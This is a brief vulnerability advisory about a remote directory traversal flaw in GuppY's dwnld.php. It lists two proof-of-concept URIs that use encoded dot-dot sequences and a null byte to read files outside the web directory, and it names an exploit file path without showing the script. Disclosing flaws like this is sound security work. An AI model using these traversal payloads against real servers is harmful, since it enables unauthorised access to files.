GuppY Dwnld.PHP Remote Directory Traversal Vulnerability

info
discussion
exploit
solution
references

GuppY Dwnld.PHP Remote Directory Traversal Vulnerability

This issue can be exploited through use of a web client.

The following proof of concept URI are available:
http://www.example.com/guppy/mobile/dwnld.php?pg=./%2E./stats
http://www.example.com/guppy/dwnld.php?pg=./%2E./test.inc%00

The following proof of concept is available:

/data/vulnerabilities/exploits/GuppY-rmt-DoS-expl.php